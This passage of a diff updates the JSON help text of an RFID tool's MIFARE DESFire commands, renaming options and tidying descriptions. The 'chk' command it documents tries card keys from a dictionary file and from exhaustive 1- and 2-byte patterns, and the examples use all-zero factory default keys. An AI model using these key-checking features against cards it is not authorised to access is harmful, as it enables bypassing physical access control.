change des key 0 in the app 123456 from 00..00 to 00..00", - "hf mfdes changekey --appisoid df01 -t aes -s lrp --newkeyno 01 -> change key 01 via lrp channelhf mfdes changekey -t des --newalgo aes --newkey 11223344556677889900112233445566 --newver a5 -> change card master key to aes one", + "hf mfdes changekey --isoid df01 -t aes -s lrp --newkeyno 01 -> change key 01 via lrp channelhf mfdes changekey -t des --newalgo aes --newkey 11223344556677889900112233445566 --newver a5 -> change card master key to aes one", "hf mfdes changekey --aid 123456 -t aes --key 00000000000000000000000000000000 --newkey 11223344556677889900112233445566 -> change app master key", "hf mfdes changekey --aid 123456 -t des -n 0 --newkeyno 1 --oldkey 5555555555555555 --newkey 1122334455667788 -> change key 1 with auth from key 0", - "hf mfdes changekey --aid 123456 -t 3tdea --newkey 11223344556677889900112233445566778899001122334 -> change 3tdea key 0 from default 00..00 to provided" + "hf mfdes changekey --aid 123456 -t 3tdea --newkey 112233445566778899001122334455667788990011223344 -> change 3tdea key 0 from default 00..00 to provided" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of application (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--oldalgo old key crypto algorithm: des, 2tdea, 3tdea, aes", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt 
algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of application (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", + "--oldalgo old key crypto algorithm", "--oldkey old key (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "--newkeyno key number for change", - "--newalgo new key crypto algorithm: des, 2tdea, 3tdea, aes", - "--newkey new key (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "--newver new key's version (1 hex byte)" + "--newkeyno key number for change", + "--newalgo new key crypto algorithm", + "--newkey new key (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--newver version of new key (1 hex byte)" ], - "usage": "hf mfdes changekey [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--oldalgo ] [--oldkey ] [--newkeyno ] [--newalgo ] [--newkey ] [--newver ]" + "usage": "hf mfdes changekey [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--oldalgo ] [--oldkey ] [--newkeyno ] [--newalgo ] [--newkey ] [--newver ]" }, "hf mfdes chfilesettings": { "command": "hf mfdes chfilesettings", "description": "get file settings from file from application. 
master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes chfilesettings --aid 123456 --fid 01 --amode plain --rrights free --wrights free --rwrights free --chrights key0 -> change file settings app=123456, file=01 with defaults from `default` command", - "hf mfdes chfilesettings -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 --rawdata 00eeee -> execute with default factory setup", + "hf mfdes chfilesettings -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 --rawdata 00eeee -> execute with default factory setup", "hf mfdes chfilesettings --aid 123456 --fid 01 --rawdata 810000021f112f22 -> change file settings with additional rights for keys 1 and 2", - "hf mfdes chfilesettings --appisoid df01 --fid 00 --amode plain --rawrights eee0 -s lrp -t aes -> change file settings via lrp channel" + "hf mfdes chfilesettings --isoid df01 --fid 00 --amode plain --rawrights eee0 -s lrp -t aes -> change file settings via lrp channel" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte)", - "--rawdata file settings (hex > 5 bytes). 
have priority over the other settings.", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--rawdata file settings (hex > 5 bytes). 
have priority over the other settings", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication" ], - "usage": "hf mfdes chfilesettings [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--rawdata ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth]" + "usage": "hf mfdes chfilesettings [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--rawdata ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth]" }, "hf mfdes chk": { "command": "hf mfdes chk", 
@@ -4365,19 +4421,19 @@ "offline": false, "options": [ "-h, --help this help", - "--aid use specific aid (3 hex bytes, big endian)", - "-k, --key key for checking (hex 16 bytes)", - "-d, --dict file with keys dictionary", + "--aid use specific aid (3 hex bytes, big endian)", + "-k, --key key for checking (hex 16 bytes)", + "-d, --dict dictionary file with keys", "--pattern1b check all 1-byte combinations of key (0000...0000, 0101...0101, 0202...0202, ...)", "--pattern2b check all 2-byte combinations of key (0000...0000, 0001...0001, 0002...0002, ...)", "--startp2b start key (2-byte hex) for 2-byte search (use with `--pattern2b`)", - "-j, --json json file to save keys", - "-v, --verbose verbose mode.", - "-f, --kdf key derivation function (kdf) (0=none, 1=an10922, 2=gallagher)", - "-i, --kdfi kdf input (hex 1-31 bytes)", + "-j, --json json file name to save keys", + "-v, --verbose verbose mode", + "--kdf <0|1|2> key derivation function (kdf) (0=none, 1=an10922, 2=gallagher)", + "-i, --kdfi kdf input (1-31 hex bytes)", "-a, --apdu show apdu requests and responses" ], - "usage": "hf mfdes chk [-hva] [--aid ] [-k ] [-d ] [--pattern1b] [--pattern2b] [--startp2b ] [-j ] [-f ] [-i ]" + "usage": "hf mfdes chk [-hva] [--aid ] [-k ] [-d ] [--pattern1b] [--pattern2b] [--startp2b ] [-j ] [--kdf <0|1|2>] [-i ]" }, "hf mfdes chkeysettings": { "command": "hf mfdes chkeysettings", 
@@ -4390,46 +4446,46 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "-d, --data key settings (hex 1 byte)" - ], - "usage": "hf mfdes chkeysettings [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [-d ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "-d, --data key settings (1 hex byte)" + ], + "usage": "hf mfdes chkeysettings [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [-d ]" }, "hf mfdes clearrecfile": { "command": "hf mfdes clearrecfile", "description": "clear record file. 
master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes clearrecfile --aid 123456 --fid 01 -> clear record file for: app=123456, file=01 with defaults from `default` command", - "hf mfdes clearrecfile --appisoid df01 --fid 01 -s lrp -t aes -n 3 -> clear record file for lrp channel with key number 3" + "hf mfdes clearrecfile --isoid df01 --fid 01 -s lrp -t aes -n 3 -> clear record file for lrp channel with key number 3" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id for clearing (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id for clearing (1 hex byte)", "--no-auth execute without authentication" ], - "usage": "hf mfdes clearrecfile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--no-auth]" + "usage": "hf mfdes clearrecfile [-hav] [-n ] [-t ] [-k ] 
[--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--no-auth]" }, "hf mfdes createapp": { "command": "hf mfdes createapp", 
@@ -4472,26 +4528,26 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", + "-t, --algo crypt algo", "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--rawdata raw data that sends to command", "--aid application id for create. mandatory. (3 hex bytes, big endian)", - "--fid iso file id. forbidden values: 0000 3f00, 3fff, ffff. (2 hex bytes, big endian). if specified - enable iso file id over all the files in the app.", - "--dfname iso df name 1..16 chars string", - "--ks1 key settings 1 (hex 1 byte). application master key settings. default 0x0f", - "--ks2 key settings 2 (hex 1 byte). default 0x0e", - "--dstalgo application key crypt algo: des, 2tdea, 3tdea, aes. default des", - "--numkeys number of keys 0x00..0x0e. default 0x0e", + "--fid iso file id. forbidden values: 0000 3f00, 3fff, ffff. (2 hex bytes, big endian)", + "--dfname iso df name (1..16 chars)", + "--ks1 key settings 1 (1 hex byte). application master key settings (def: 0x0f)", + "--ks2 key settings 2 (1 hex byte). 
(def: 0x0e)", + "--dstalgo application key crypt algo (def: des)", + "--numkeys number of keys 0x00..0x0e (def: 0x0e)", "--no-auth execute without authentication" ], - "usage": "hf mfdes createapp [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--rawdata ] [--aid ] [--fid ] [--dfname ] [--ks1 ] [--ks2 ] [--dstalgo ] [--numkeys ] [--no-auth]" + "usage": "hf mfdes createapp [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--rawdata ] [--aid ] [--fid ] [--dfname ] [--ks1 ] [--ks2 ] [--dstalgo ] [--numkeys ] [--no-auth]" }, "hf mfdes createfile": { "command": "hf mfdes createfile", 
@@ -4503,37 +4559,37 @@ "hf mfdes createfile --aid 123456 --fid 01 --isofid 0001 --size 000010 -> create file with iso id. authentication with defaults from `default` command", "hf mfdes createfile --aid 123456 --fid 01 --rawtype 01 --rawdata 000100eeee000100 -> create file via sending rawdata to the card. can be used to create any type of file. authentication with defaults from `default` command", "hf mfdes createfile --aid 123456 --fid 01 --amode plain --rrights free --wrights free --rwrights free --chrights key0 -> create file app=123456, file=01 and mentioned rights with defaults from `default` command", - "hf mfdes createfile -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 --rawtype 00 --rawdata 00eeee000100 -> execute with default factory setup" + "hf mfdes createfile -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 --rawtype 00 --rawdata 00eeee000100 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", - "--isofid iso file id (2 hex bytes)", - "--rawtype raw file type (hex 1 byte)", - "--rawdata raw file settings (hex > 5 bytes)", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the 
specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--isofid iso file id (2 hex bytes)", + "--rawtype raw file type (1 hex byte)", + "--rawdata raw file settings (hex > 5 bytes)", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication", "--size file size (3 hex bytes, big endian)", "--backup create backupfile instead of standard file" ], - "usage": "hf mfdes createfile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--isofid ] [--rawtype ] [--rawdata ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--size ] [--backup]" + "usage": "hf mfdes createfile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--isofid ] [--rawtype ] [--rawdata ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--size ] [--backup]" }, "hf mfdes createmacfile": { "command": "hf mfdes createmacfile", 
@@ -4545,37 +4601,37 @@ "", "hf mfdes createmacfile --aid 123456 --fid 01 --rawrights 0ff0 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file with parameters. rights from default. authentication with defaults from `default` command", "hf mfdes createmacfile --aid 123456 --fid 01 --amode plain --rrights free --wrights deny --rwrights free --chrights key0 --mackey 00112233445566778899aabbccddeeff -> create file app=123456, file=01, with key, and mentioned rights with defaults from `default` command", - "hf mfdes createmacfile -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 -> execute with default factory setup. key and keyver == 0x00..00", - "hf mfdes createmacfile --appisoid df01 --fid 0f -s lrp -t aes --rawrights 0ff0 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file via lrp channel", - "hf mfdes createmacfile --appisoid df01 --fid 0f -s lrp -t aes --rawrights 0f10 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file via lrp channel with commitreaderid command enable" + "hf mfdes createmacfile -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 -> execute with default factory setup. 
key and keyver == 0x00..00", + "hf mfdes createmacfile --isoid df01 --fid 0f -s lrp -t aes --rawrights 0ff0 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file via lrp channel", + "hf mfdes createmacfile --isoid df01 --fid 0f -s lrp -t aes --rawrights 0f10 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file via lrp channel with commitreaderid command enable" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte)", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid 
application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication", - "--mackey aes-128 key for mac (16 hex bytes, big endian). default 0x00..00", - "--mackeyver aes key version for mac (1 hex byte). default 0x00" + "--mackey aes-128 key for mac (16 hex bytes, big endian). (def: all zeros)", + "--mackeyver aes key version for mac (1 hex byte). (def: 0x0)" ], - "usage": "hf mfdes createmacfile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--mackey ] [--mackeyver ]" + "usage": "hf mfdes createmacfile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--mackey ] [--mackeyver ]" }, "hf mfdes createrecordfile": { "command": "hf mfdes createrecordfile", 
@@ -4585,36 +4641,36 @@ "key/mode/etc of the authentication depends on application settings", "hf mfdes createrecordfile --aid 123456 --fid 01 --size 000010 --maxrecord 000010 --cyclic -> create cyclic record file with parameters. rights from default. authentication with defaults from `default` command", "hf mfdes createrecordfile --aid 123456 --fid 01 --amode plain --rrights free --wrights free --rwrights free --chrights key0 --size 000010 --maxrecord 000010 -> create linear record file app=123456, file=01 and mentioned rights with defaults from `default` command", - "hf mfdes createrecordfile -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 --size 000010 --maxrecord 000010 -> execute with default factory setup" + "hf mfdes createrecordfile -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 --size 000010 --maxrecord 000010 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", - "--isofid iso file id (2 hex bytes)", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file 
settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--isofid iso file id (2 hex bytes)", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication", "--size record size (3 hex bytes, big endian, 000001 to ffffff)", "--maxrecord max. number of records (3 hex bytes, big endian)", "--cyclic create cyclic record file instead of linear record file" ], - "usage": "hf mfdes createrecordfile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--isofid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--size ] [--maxrecord ] [--cyclic]" + "usage": "hf mfdes createrecordfile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--isofid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--size ] [--maxrecord ] [--cyclic]" }, "hf mfdes createvaluefile": { "command": "hf mfdes createvaluefile", 
@@ -4624,56 +4680,56 @@ "key/mode/etc of the authentication depends on application settings", "hf mfdes createvaluefile --aid 123456 --fid 01 --lower 00000010 --upper 00010000 --value 00000100 -> create file with parameters. rights from default. authentication with defaults from `default` command", "hf mfdes createvaluefile --aid 123456 --fid 01 --amode plain --rrights free --wrights free --rwrights free --chrights key0 -> create file app=123456, file=01 and mentioned rights with defaults from `default` command", - "hf mfdes createvaluefile -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 -> execute with default factory setup" + "hf mfdes createvaluefile -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for 
authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication", "--lower lower limit (4 hex bytes, big endian)", "--upper upper limit (4 hex bytes, big endian)", "--value value (4 hex bytes, big endian)", "--lcredit limited credit enabled (bit 0 = limited credit, 1 = freevalue)" ], - "usage": "hf mfdes createvaluefile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--lower ] [--upper ] [--value ] [--lcredit ]" + "usage": "hf mfdes createvaluefile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--lower ] [--upper ] [--value ] [--lcredit ]" }, "hf mfdes default": { "command": "hf mfdes default", - "description": "set default parameters for access to desfire card.", + "description": "set default parameters for access to mifare desfire card.", "notes": [ - "hf mfdes default -n 0 -t des -k 0000000000000000 -f none -> save to the default parameters" + "hf mfdes default -n 0 -t des -k 0000000000000000 --kdf none -> save to the default parameters" ], "offline": false, "options": [ "-h, --help this help", 
- "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp" + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel" ], - "usage": "hf mfdes default [-h] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ]" + "usage": "hf mfdes default [-h] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ]" }, "hf mfdes deleteapp": { "command": "hf mfdes deleteapp", 
